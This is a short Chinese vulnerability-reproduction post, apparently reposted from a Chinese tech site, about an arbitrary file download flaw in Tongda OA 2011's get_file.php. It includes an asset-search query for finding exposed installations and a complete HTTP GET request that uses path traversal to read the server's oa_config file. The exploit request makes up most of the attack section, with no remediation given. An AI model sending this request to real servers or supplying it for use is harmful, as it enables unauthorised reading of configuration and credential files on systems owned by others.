一、漏洞简介
通达OA get_file.php文件存在任意文件下载漏洞,攻击者通过漏洞可以读取服务器敏感文件。
二、影响版本
● 通达OA2011
三、资产测绘
● hunterapp.name="通达 OA"
● 特征
文章来源:https://www.toymoban.com/news/detail-833339.html
四、漏洞复现
GET /module/AIP/get_file.php?MODULE=/&ATTACHMENT_NAME=php&ATTACHMENT_ID=.._webroot/inc/oa_config HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=lrvmku93t8g0ce7b90qaroic96; KEY_RANDOMDATA=10603
Upgrade-Insecure-Requests: 1
文章来源地址https://www.toymoban.com/news/detail-833339.html
到了这里,关于【漏洞复现-通达OA】通达OA get_file.php 任意文件下载漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!